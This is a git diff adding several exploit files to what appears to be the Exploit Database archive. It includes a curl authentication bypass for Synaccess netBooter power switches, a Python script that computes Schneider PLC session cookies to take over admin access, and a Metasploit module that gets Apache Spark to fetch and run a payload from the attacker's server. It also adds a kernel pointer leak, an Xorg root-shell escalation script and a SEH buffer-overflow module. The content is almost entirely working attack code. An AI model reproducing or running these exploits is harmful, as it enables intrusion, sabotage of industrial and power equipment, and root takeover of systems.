diff --git a/exploits/cgi/webapps/45920.txt b/exploits/cgi/webapps/45920.txt
new file mode 100644
index 000000000..d1b71c48d
--- /dev/null
+++ b/exploits/cgi/webapps/45920.txt
@@ -0,0 +1,49 @@
+Synaccess netBooter NP-02x/NP-08x 6.8 Authentication Bypass
+
+
+Vendor: Synaccess Networks Inc.
+Product web page: https://www.synaccess-net.com
+Affected version: NP-0201D (ver 6.8C)
+ NP-02 (ver 6.5C)
+ NP-02 (ver 6.4BC)
+ NP-0801D (ver 6.4A)
+ NP-08 (ver 6.10)
+ NP-02 (ver 5.53BC)
+
+Summary: netBooter NP-02B and NP-02BH provide independent
+control of one or two outlets in a small, robust form factor.
+Manageable via TCP/IP network or direct serial connection
+and 1U brackets (optional) for mounting. Control power to
+your devices with the ability to fit just about anywhere.
+
+netBooter NP-0801DU and NP-0801DUH PDUs provide secured
+remote power source management of 8 independent outlets.
+Includes true RMS AC current reading and environment
+temperature monitoring* via TCP/IP networks or local direct
+connection.
+
+Desc: netBooter suffers from an authentication bypass
+vulnerability due to missing control check when calling
+webNewAcct.cgi script while creating users. This allows an
+unauthenticated attacker to create admin user account and
+bypass authentication giving her the power to turn off a
+power supply to a resource.
+
+Tested on: Synaccess server
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5500
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5500.php
+
+
+05.11.2018
+
+--
+
+PoC:
+
+curl -i http://10.0.0.17/webNewAcct.cgi --data "A1=hackerplusplus&A2=1234&A2=1234"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45918.py b/exploits/hardware/webapps/45918.py
new file mode 100755
index 000000000..7e8379120
--- /dev/null
+++ b/exploits/hardware/webapps/45918.py
@@ -0,0 +1,118 @@
+#! /usr/bin/env python
+'''
+ Copyright 2018 Photubias(c)
+ # Exploit Title: Schneider Session Calculation - CVE-2017-6026
+ # Date: 2018-09-30
+ # Exploit Author: Deneut Tijl
+ # Vendor Homepage: www.schneider-electric.com
+ # Software Link: https://www.schneider-electric.com/en/download/document/M241-M251+Firmware+v4.0.3.20/
+ # Version: Schneider Electric PLC 4.0.2.11 & Boot v0.0.2.11
+ # CVE : CVE-2017-6026
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see .
+
+ File name CVE-2017-6026-SchneiderSessionCalculation.py
+ written by tijl[dot]deneut[at]howest[dot]be
+
+ Tested on the Schneider TM241 PLC with Firmware 4.0.2.11 & Boot 0.0.2.11.
+ Firmware: https://www.schneider-electric.com/en/download/document/M241-M251+Firmware+v4.0.3.20/
+ Security Note: https://www.schneider-electric.com/en/download/document/SEVD-2017-075-02/
+
+ This script will calculate the website session cookie, which is static after every reboot.
+ (This cookie is actually the Epoch time at PLC startup)
+ The only prerequisite is that, since the reboot, a user must have been logged in.
+ E.g. Administrator (with default password 'admin')
+ or USER (with default password 'USER')
+
+ After retrieving the cookie, various website actions are possible (including a DoS).
+ Sample output:
+ C:\Users\admin\Desktop>SchneiderGetSession.py
+ Please enter an IP [10.10.36.224]:
+ This device has booted 33 times
+ Cookie: 1521612584 (22/03/2018 06:09:44.014)
+ ----------------
+ --- Device: TM241CE40R
+ --- MAC Address: 0080F40B24E0
+ --- Firmware: 4.0.2.11
+ --- Controller: Running
+ ----------------
+ Press Enter to close
+'''
+import urllib2
+
+strIP = raw_input('Please enter an IP [10.10.36.224]: ')
+if strIP == '': strIP = '10.10.36.224'
+FwLogURL = 'http://' + strIP + '/usr/Syslog/FwLog.txt'
+try:
+ FwLogResp = urllib2.urlopen(urllib2.Request(FwLogURL)).readlines()
+ NumberOfPowerOns = 0
+ for line in FwLogResp:
+ if 'Firmware core2' in line:
+ NumberOfPowerOns += 1
+ CookieVal = line.split(' ')[1]
+ BootupTime = line.split('(')[1].split(')')[0]
+ NumberOfPowerOns /= 2
+except:
+ print('Error: URL not found.')
+ raw_input('Press enter to exit')
+ exit()
+
+try:
+ CookieVal
+except:
+ print('Error: ' + FwLogURL + ' does not contain the necessary data.')
+ raw_input('Press Enter to Exit')
+ exit()
+
+print('This device has booted ' + str(NumberOfPowerOns) + ' times')
+print('Cookie: ' + CookieVal + ' (' + BootupTime + ')')
+print('----------------')
+raw_input('Press enter to see if the cookie is set on the webserver.'+"\n")
+
+CtrlURL = 'http://' + strIP + '/plcExchange/getValues/'
+CtrlPost = 'S;100;0;136;s;s;S;2;0;24;w;d;S;1;0;8;B;d;S;1;0;9;B;d;S;1;0;10;B;d;S;1;0;11;B;d;'
+
+try:
+ CtrlUser = 'Administrator'
+ DataReq = urllib2.Request(CtrlURL, CtrlPost, headers={'Cookie':'M258_LOG=' + CtrlUser + ':' + CookieVal})
+ DataResp = urllib2.urlopen(DataReq).read()
+except:
+ print('Failure for user \'Administrator\'')
+ try:
+ CtrlUser = 'USER'
+ DataReq = urllib2.Request(CtrlURL, CtrlPost, headers={'Cookie':'M258_LOG=' + CtrlUser + ':' + CookieVal})
+ DataResp = urllib2.urlopen(DataReq).read()
+ except:
+ print('Failure for user \'USER\'')
+ raw_input('Press enter to exit')
+print('### SUCCESS (' + CtrlUser + ') ###')
+print('--- Device: ' + DataResp.split(' ')[0])
+print('--- MAC Address: ' + DataResp.split(';')[0].split(' ')[1][1:])
+print('--- Firmware: ' + DataResp.split(';')[2] + '.' + DataResp.split(';')[3] + '.' +DataResp.split(';')[4] + '.' +DataResp.split(';')[5])
+state = DataResp.split(';')[1]
+if state == '2':
+ print('--- Controller: Running')
+elif state == '1':
+ print('--- Controller: Stopped')
+elif state == '0':
+ print('--- Controller: ERROR mode')
+print('')
+print('--- To exploit: Create cookie for domain "'+strIP+'"')
+print(' with name "M258_LOG" and value "'+CtrlUser+':'+CookieVal+'"')
+print(' and open "http://'+strIP+'/index2.htm"')
+print('')
+print('----------------')
+
+raw_input('Press enter to close')
+exit()
\ No newline at end of file
diff --git a/exploits/java/remote/45925.rb b/exploits/java/remote/45925.rb
new file mode 100755
index 000000000..2bcb635f6
--- /dev/null
+++ b/exploits/java/remote/45925.rb
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apache Spark Unauthenticated Command Execution',
+ 'Description' => %q{
+ This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
+ It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'aRe00t', # Proof of concept
+ 'Green-m ' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://www.jianshu.com/p/a080cb323832'],
+ ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']
+ ],
+ 'Platform' => 'java',
+ 'Arch' => [ARCH_JAVA],
+ 'Targets' =>
+ [
+ ['Automatic', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Dec 12 2017',
+ 'DefaultTarget' => 0,
+ 'Notes' =>
+ {
+ 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+ 'Stability' => [ CRASH_SAFE ],
+ 'Reliability' => [ REPEATABLE_SESSION]
+ }
+ ))
+
+ register_options [
+ Opt::RPORT(6066),
+ OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])
+ ]
+
+ end
+
+ def check
+ return CheckCode::Detected if get_version
+ CheckCode::Unknown
+ end
+
+ def primer
+ path = service.resources.keys[0]
+ binding_ip = srvhost_addr
+
+ proto = datastore['SSL'] ? 'https' : 'http'
+ payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"
+
+ send_payload(payload_uri)
+ end
+
+ def exploit
+ fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
+
+ vprint_status("Generating payload ...")
+ @pl = generate_payload.encoded_jar(random:true)
+ print_error("Failed to generate the payload.") unless @pl
+
+ print_status("Starting up our web service ...")
+ Timeout.timeout(datastore['HTTPDELAY']) { super }
+ rescue Timeout::Error
+ end
+
+ def get_version
+ @version = nil
+
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path),
+ 'method' => 'GET'
+ )
+
+ unless res
+ vprint_bad("#{peer} - No response. ")
+ return false
+ end
+
+ if res.code == 401
+ print_bad("#{peer} - Authentication required.")
+ return false
+ end
+
+ unless res.code == 400
+ return false
+ end
+
+ res_json = res.get_json_document
+ @version = res_json['serverSparkVersion']
+
+ if @version.nil?
+ vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")
+ return false
+ end
+
+ true
+ end
+
+ def send_payload(payload_uri)
+ rand_appname = Rex::Text.rand_text_alpha_lower(8..16)
+
+ data =
+ {
+ "action" => "CreateSubmissionRequest",
+ "clientSparkVersion" => @version.to_s,
+ "appArgs" => [],
+ "appResource" => payload_uri.to_s,
+ "environmentVariables" => {"SPARK_ENV_LOADED" => "1"},
+ "mainClass" => "#{@pl.substitutions["metasploit"]}.Payload",
+ "sparkProperties" =>
+ {
+ "spark.jars" => payload_uri.to_s,
+ "spark.driver.supervise" => "false",
+ "spark.app.name" => rand_appname.to_s,
+ "spark.eventLog.enabled" => "true",
+ "spark.submit.deployMode" => "cluster",
+ "spark.master" => "spark://#{rhost}:#{rport}"
+ }
+ }
+
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, "/v1/submissions/create"),
+ 'method' => 'POST',
+ 'ctype' => 'application/json;charset=UTF-8',
+ 'data' => data.to_json
+ )
+
+ end
+
+ # Handle incoming requests
+ def on_request_uri(cli, request)
+ print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+ send_response(cli, @pl)
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/dos/45919.c b/exploits/linux/dos/45919.c
new file mode 100644
index 000000000..0933b6853
--- /dev/null
+++ b/exploits/linux/dos/45919.c
@@ -0,0 +1,404 @@
+# Exploit Title: Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp kernel pointer
+# Google Dork: -
+# Date: 2018-11-20
+# Exploit Author: Jinbum Park
+# Vendor Homepage: -
+# Software Link: -
+# Version: Linux Kernel 4.8 (Ubuntu 16.04)
+# Tested on: 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+# CVE: 2017-7558
+# Category: Local
+
+/*
+ * [ Briefs ]
+ * - CVE-2017-7558 has discovered and reported by Stefano Brivio of the Red Hat. (but, no publicly available exploit)
+ * - This is local exploit against the CVE-2017-7558.
+ *
+ * [ Tested version ]
+ * - 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+ *
+ * [ Prerequisites ]
+ * - sudo apt-get install libsctp-dev
+ *
+ * [ Goal ]
+ * - Leak kernel symbol address of "sctp_af_inet"
+ *
+ * [ Run exploit ]
+ * - $ gcc poc.c -o poc -lsctp -lpthread
+ * - $ ./poc
+ * [] Waiting for connection
+ * [] New client connected
+ * [] Received data: Hello, Server!
+ * [] sctp_af_inet address : 0
+ * [] sctp_af_inet address : ffffffffc0c541e0
+ * [] sctp_af_inet address : 0
+ * [] sctp_af_inet address : ffffffffc0c541e0 (leaked kernel pointer)
+ * - $ sudo cat /proc/kallsyms | grep sctp_af_inet (Check whether leaked pointer value is corret)
+ * ffffffffc0c541e0 d sctp_af_inet [sctp]
+ *
+ * [ Contact ]
+ * - jinb.park7@gmail.com
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define MY_PORT_NUM 62324
+
+struct sctp_info {
+ __u32 sctpi_tag;
+ __u32 sctpi_state;
+ __u32 sctpi_rwnd;
+ __u16 sctpi_unackdata;
+ __u16 sctpi_penddata;
+ __u16 sctpi_instrms;
+ __u16 sctpi_outstrms;
+ __u32 sctpi_fragmentation_point;
+ __u32 sctpi_inqueue;
+ __u32 sctpi_outqueue;
+ __u32 sctpi_overall_error;
+ __u32 sctpi_max_burst;
+ __u32 sctpi_maxseg;
+ __u32 sctpi_peer_rwnd;
+ __u32 sctpi_peer_tag;
+ __u8 sctpi_peer_capable;
+ __u8 sctpi_peer_sack;
+ __u16 __reserved1;
+
+ /* assoc status info */
+ __u64 sctpi_isacks;
+ __u64 sctpi_osacks;
+ __u64 sctpi_opackets;
+ __u64 sctpi_ipackets;
+ __u64 sctpi_rtxchunks;
+ __u64 sctpi_outofseqtsns;
+ __u64 sctpi_idupchunks;
+ __u64 sctpi_gapcnt;
+ __u64 sctpi_ouodchunks;
+ __u64 sctpi_iuodchunks;
+ __u64 sctpi_oodchunks;
+ __u64 sctpi_iodchunks;
+ __u64 sctpi_octrlchunks;
+ __u64 sctpi_ictrlchunks;
+
+ /* primary transport info */
+ struct sockaddr_storage sctpi_p_address;
+ __s32 sctpi_p_state;
+ __u32 sctpi_p_cwnd;
+ __u32 sctpi_p_srtt;
+ __u32 sctpi_p_rto;
+ __u32 sctpi_p_hbinterval;
+ __u32 sctpi_p_pathmaxrxt;
+ __u32 sctpi_p_sackdelay;
+ __u32 sctpi_p_sackfreq;
+ __u32 sctpi_p_ssthresh;
+ __u32 sctpi_p_partial_bytes_acked;
+ __u32 sctpi_p_flight_size;
+ __u16 sctpi_p_error;
+ __u16 __reserved2;
+
+ /* sctp sock info */
+ __u32 sctpi_s_autoclose;
+ __u32 sctpi_s_adaptation_ind;
+ __u32 sctpi_s_pd_point;
+ __u8 sctpi_s_nodelay;
+ __u8 sctpi_s_disable_fragments;
+ __u8 sctpi_s_v4mapped;
+ __u8 sctpi_s_frag_interleave;
+ __u32 sctpi_s_type;
+ __u32 __reserved3;
+};
+
+enum {
+ SS_UNKNOWN,
+ SS_ESTABLISHED,
+ SS_SYN_SENT,
+ SS_SYN_RECV,
+ SS_FIN_WAIT1,
+ SS_FIN_WAIT2,
+ SS_TIME_WAIT,
+ SS_CLOSE,
+ SS_CLOSE_WAIT,
+ SS_LAST_ACK,
+ SS_LISTEN,
+ SS_CLOSING,
+ SS_MAX
+};
+
+enum sctp_state {
+ SCTP_STATE_CLOSED = 0,
+ SCTP_STATE_COOKIE_WAIT = 1,
+ SCTP_STATE_COOKIE_ECHOED = 2,
+ SCTP_STATE_ESTABLISHED = 3,
+ SCTP_STATE_SHUTDOWN_PENDING = 4,
+ SCTP_STATE_SHUTDOWN_SENT = 5,
+ SCTP_STATE_SHUTDOWN_RECEIVED = 6,
+ SCTP_STATE_SHUTDOWN_ACK_SENT = 7,
+};
+
+enum {
+ TCP_ESTABLISHED = 1,
+ TCP_SYN_SENT,
+ TCP_SYN_RECV,
+ TCP_FIN_WAIT1,
+ TCP_FIN_WAIT2,
+ TCP_TIME_WAIT,
+ TCP_CLOSE,
+ TCP_CLOSE_WAIT,
+ TCP_LAST_ACK,
+ TCP_LISTEN,
+ TCP_CLOSING, /* Now a valid state */
+ TCP_NEW_SYN_RECV,
+
+ TCP_MAX_STATES /* Leave at the end! */
+};
+
+enum sctp_sock_state {
+ SCTP_SS_CLOSED = TCP_CLOSE,
+ SCTP_SS_LISTENING = TCP_LISTEN,
+ SCTP_SS_ESTABLISHING = TCP_SYN_SENT,
+ SCTP_SS_ESTABLISHED = TCP_ESTABLISHED,
+ SCTP_SS_CLOSING = TCP_CLOSE_WAIT,
+};
+
+static volatile int servser_stop_flag = 0;
+static volatile int client_stop_flag = 0;
+
+static void *server_thread(void *arg) {
+ int listen_fd, conn_fd, flags, ret, in;
+ char buffer[1024];
+ struct sctp_sndrcvinfo sndrcvinfo;
+ struct sockaddr_in servaddr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_ANY),
+ .sin_port = htons(MY_PORT_NUM),
+ };
+ struct sctp_initmsg initmsg = {
+ .sinit_num_ostreams = 5,
+ .sinit_max_instreams = 5,
+ .sinit_max_attempts = 4,
+ };
+
+ listen_fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
+ if (listen_fd < 0)
+ return NULL;
+
+ ret = bind(listen_fd, (struct sockaddr *) &servaddr, sizeof(servaddr));
+ if (ret < 0)
+ return NULL;
+
+ ret = setsockopt(listen_fd, IPPROTO_SCTP, SCTP_INITMSG, &initmsg, sizeof(initmsg));
+ if (ret < 0)
+ return NULL;
+
+ ret = listen(listen_fd, initmsg.sinit_max_instreams);
+ if (ret < 0)
+ return NULL;
+
+ printf("[] Waiting for connection\n");
+
+ conn_fd = accept(listen_fd, (struct sockaddr *) NULL, NULL);
+ if(conn_fd < 0)
+ return NULL;
+
+ printf("[] New client connected\n");
+
+ in = sctp_recvmsg(conn_fd, buffer, sizeof(buffer), NULL, 0, &sndrcvinfo, &flags);
+ if (in > 0) {
+ printf("[] Received data: %s\n", buffer);
+ }
+
+ while (servser_stop_flag == 0)
+ sleep(1);
+
+ close(conn_fd);
+ return NULL;
+}
+
+static void *client_thread(void *arg) {
+ int conn_fd, ret;
+ const char *msg = "Hello, Server!";
+ struct sockaddr_in servaddr = {
+ .sin_family = AF_INET,
+ .sin_port = htons(MY_PORT_NUM),
+ .sin_addr.s_addr = inet_addr("127.0.0.1"),
+ };
+
+ conn_fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
+ if (conn_fd < 0)
+ return NULL;
+
+ ret = connect(conn_fd, (struct sockaddr *) &servaddr, sizeof(servaddr));
+ if (ret < 0)
+ return NULL;
+
+ ret = sctp_sendmsg(conn_fd, (void *) msg, strlen(msg) + 1, NULL, 0, 0, 0, 0, 0, 0 );
+ if (ret < 0)
+ return NULL;
+
+ while (client_stop_flag == 0)
+ sleep(1);
+
+ close(conn_fd);
+ return NULL;
+}
+
+//Copied from libmnl source
+#define SOCKET_BUFFER_SIZE (getpagesize() < 8192L ? getpagesize() : 8192L)
+
+int send_diag_msg(int sockfd){
+ struct msghdr msg;
+ struct nlmsghdr nlh;
+ struct inet_diag_req_v2 conn_req;
+ struct sockaddr_nl sa;
+ struct iovec iov[4];
+ int retval = 0;
+
+ //For the filter
+ struct rtattr rta;
+ void *filter_mem = NULL;
+ int filter_len = 0;
+
+ memset(&msg, 0, sizeof(msg));
+ memset(&sa, 0, sizeof(sa));
+ memset(&nlh, 0, sizeof(nlh));
+ memset(&conn_req, 0, sizeof(conn_req));
+
+ sa.nl_family = AF_NETLINK;
+
+ conn_req.sdiag_family = AF_INET;
+ conn_req.sdiag_protocol = IPPROTO_SCTP;
+ conn_req.idiag_states = SCTP_SS_CLOSED;
+ conn_req.idiag_ext |= (1 << (INET_DIAG_INFO - 1));
+
+ nlh.nlmsg_len = NLMSG_LENGTH(sizeof(conn_req));
+ nlh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST;
+
+ nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
+ iov[0].iov_base = (void*) &nlh;
+ iov[0].iov_len = sizeof(nlh);
+ iov[1].iov_base = (void*) &conn_req;
+ iov[1].iov_len = sizeof(conn_req);
+
+ //Set essage correctly
+ msg.msg_name = (void*) &sa;
+ msg.msg_namelen = sizeof(sa);
+ msg.msg_iov = iov;
+ if(filter_mem == NULL)
+ msg.msg_iovlen = 2;
+ else
+ msg.msg_iovlen = 4;
+
+ retval = sendmsg(sockfd, &msg, 0);
+
+ if(filter_mem != NULL)
+ free(filter_mem);
+
+ return retval;
+}
+
+void parse_diag_msg(struct inet_diag_msg *diag_msg, int rtalen){
+ struct rtattr *attr;
+ struct sctp_info *sctpi;
+ int i;
+ unsigned char *ptr;
+
+ if(diag_msg->idiag_family != AF_INET && diag_msg->idiag_family != AF_INET6) {
+ fprintf(stderr, "Unknown family\n");
+ return;
+ }
+
+ if(rtalen > 0){
+ attr = (struct rtattr*) (diag_msg+1);
+
+ while(RTA_OK(attr, rtalen)){
+ if(attr->rta_type == INET_DIAG_INFO){
+ // leak kernel pointer here!!
+ sctpi = (struct sctp_info*) RTA_DATA(attr);
+ ptr = ((unsigned char *)&sctpi->sctpi_p_address + 32);
+ printf("[] sctp_af_inet address : %lx\n", *(unsigned long *)ptr);
+ }
+ attr = RTA_NEXT(attr, rtalen);
+ }
+ }
+}
+
+int main(int argc, char *argv[]){
+ int nl_sock = 0, numbytes = 0, rtalen = 0;
+ struct nlmsghdr *nlh;
+ uint8_t recv_buf[SOCKET_BUFFER_SIZE];
+ struct inet_diag_msg *diag_msg;
+ pthread_t sctp_server;
+ pthread_t sctp_client;
+
+ // run sctp server & client
+ if (pthread_create(&sctp_server, NULL, server_thread, NULL))
+ return EXIT_FAILURE;
+ sleep(2);
+
+ if (pthread_create(&sctp_client, NULL, client_thread, NULL))
+ return EXIT_FAILURE;
+ sleep(2);
+
+ // run inet_diag
+ if((nl_sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_INET_DIAG)) == -1){
+ perror("socket: ");
+ return EXIT_FAILURE;
+ }
+
+ if(send_diag_msg(nl_sock) < 0){
+ perror("sendmsg: ");
+ return EXIT_FAILURE;
+ }
+
+ while(1){
+ numbytes = recv(nl_sock, recv_buf, sizeof(recv_buf), 0);
+ nlh = (struct nlmsghdr*) recv_buf;
+
+ while(NLMSG_OK(nlh, numbytes)){
+ if(nlh->nlmsg_type == NLMSG_DONE) {
+ return EXIT_SUCCESS;
+ }
+
+ if(nlh->nlmsg_type == NLMSG_ERROR){
+ fprintf(stderr, "Error in netlink message\n");
+ return EXIT_FAILURE;
+ }
+
+ diag_msg = (struct inet_diag_msg*) NLMSG_DATA(nlh);
+ rtalen = nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*diag_msg));
+ parse_diag_msg(diag_msg, rtalen);
+
+ nlh = NLMSG_NEXT(nlh, numbytes);
+ }
+ }
+ printf("loop next\n");
+
+ // exit threads
+ client_stop_flag = 1;
+ if (pthread_join(sctp_client, NULL))
+ return EXIT_FAILURE;
+
+ servser_stop_flag = 1;
+ if (pthread_join(sctp_server, NULL))
+ return EXIT_FAILURE;
+
+ printf("end\n");
+ return EXIT_SUCCESS;
+}
\ No newline at end of file
diff --git a/exploits/openbsd/local/45922.sh b/exploits/openbsd/local/45922.sh
new file mode 100755
index 000000000..02b225524
--- /dev/null
+++ b/exploits/openbsd/local/45922.sh
@@ -0,0 +1,70 @@
+#!/bin/sh
+
+#
+# raptor_xorgy - xorg-x11-server LPE via modulepath switch
+# Copyright (c) 2018 Marco Ivaldi
+#
+# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
+# check for -modulepath and -logfile options when starting Xorg. X server
+# allows unprivileged users with the ability to log in to the system via
+# physical console to escalate their privileges and run arbitrary code under
+# root privileges (CVE-2018-14665).
+#
+# This exploit variant triggers the bug in the -modulepath command line switch
+# to load a malicious X11 module in order to escalate privileges to root on
+# vulnerable systems. This technique is less invasive than exploiting the
+# -logfile switch, however the gcc compiler must be present in order for it to
+# work out of the box. Alternatively, you must use a pre-compiled malicious .so
+# compatible with the target system and modify the exploit accordingly.
+#
+# It works very reliably on Solaris 11.4 and should work on most vulnerable
+# Linux distributions (though I haven't tested it). For some reason, it fails to
+# obtain uid 0 on OpenBSD... They might have an additional protection in place.
+#
+# Thanks to @alanc and @nushinde for discussing this alternative vector.
+#
+# See also:
+# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
+# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm
+# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html
+# https://nvd.nist.gov/vuln/detail/CVE-2006-0745
+#
+# Usage:
+# raptor@stalker:~$ chmod +x raptor_xorgy
+# raptor@stalker:~$ ./raptor_xorgy
+# [...]
+# root@stalker:~# id
+# uid=0(root) gid=0(root)
+#
+# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
+# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
+# Oracle Solaris 11 SPARC [untested]
+# CentOS Linux 7 [untested, it should work]
+# Red Hat Enterprise Linux 7 [untested]
+# Ubuntu Linux 18.10 [untested]
+# Ubuntu Linux 18.04 LTS [untested]
+# Ubuntu Linux 16.04 LTS [untested]
+# Debian GNU/Linux 9 [untested]
+# [...]
+#
+
+echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch"
+echo "Copyright (c) 2018 Marco Ivaldi "
+echo
+
+# prepare the payload
+cat << EOF > /tmp/pwned.c
+_init()
+{
+ setuid(0);
+ setgid(0);
+ system("/bin/bash");
+}
+EOF
+# libglx.so should be a good target, refer to Xorg logs for other candidates
+gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so
+if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi
+
+# trigger the bug
+echo "Got root?"
+Xorg -modulepath ",/tmp" :1
\ No newline at end of file
diff --git a/exploits/windows/dos/45923.html b/exploits/windows/dos/45923.html
new file mode 100644
index 000000000..733dddd6a
--- /dev/null
+++ b/exploits/windows/dos/45923.html
@@ -0,0 +1,146 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/dos/45924.html b/exploits/windows/dos/45924.html
new file mode 100644
index 000000000..96135a778
--- /dev/null
+++ b/exploits/windows/dos/45924.html
@@ -0,0 +1,100 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/45921.rb b/exploits/windows/local/45921.rb
new file mode 100755
index 000000000..40d63433b
--- /dev/null
+++ b/exploits/windows/local/45921.rb
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HTML5 Video Player 1.2.5 - Buffer Overflow (SEH)',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow in HTML5 Video Player 1.2.5 , when
+ with the name "msf.txt". 1.file with the name "msf.txt" and copy content to clipboard ,2.Open software, click Help > Register and paste "Username" click "OK".
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'T3jv1l', # Original discovery
+ 'Kağan Çapar', # Original discovery
+ 'd3ckx1 d3ck(at)qq.com', # MSF module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '' ],
+ [ 'EBD', '45888' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x1a",
+ 'DisableNops' => true,
+ 'Space' => 4000
+ },
+ 'Targets' =>
+ [
+ [ 'HTML Video Player 1.2.5',
+ {
+ 'Ret' => 0x7C901931, # 0x7C901931 : P/P/R FROM ntdll.dll form winxp sp3
+ 'Offset' => 1984
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Nov 22 2018',
+ 'DefaultTarget' => 0))
+
+ register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class)
+
+ end
+
+ def exploit
+ buf = "\x41"*(target['Offset'])
+ buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
+ buf << [target.ret] .pack('V') # seh
+ buf << make_nops(30)
+ buf << payload.encoded
+ buf << "\x90" * 300
+
+ file_create(buf)
+ handler
+
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e4c910aa8..e6a134bfc 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6199,6 +6199,9 @@ id,file,description,date,author,type,platform,port
45910,exploits/multiple/dos/45910.js,"WebKit JSC JIT - 'JSPropertyNameEnumerator' Type Confusion",2018-11-29,"Google Security Research",dos,multiple,
45911,exploits/multiple/dos/45911.js,"WebKit JIT - 'ByteCodeParser::handleIntrinsicCall' Type Confusion",2018-11-29,"Google Security Research",dos,multiple,
45912,exploits/multiple/dos/45912.js,"WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the 'ForInContext' Object",2018-11-29,"Google Security Research",dos,multiple,
+45919,exploits/linux/dos/45919.c,"Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer",2018-11-30,"Jinbum Park",dos,linux,
+45923,exploits/windows/dos/45923.html,"VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free",2018-11-30,"Google Security Research",dos,windows,
+45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
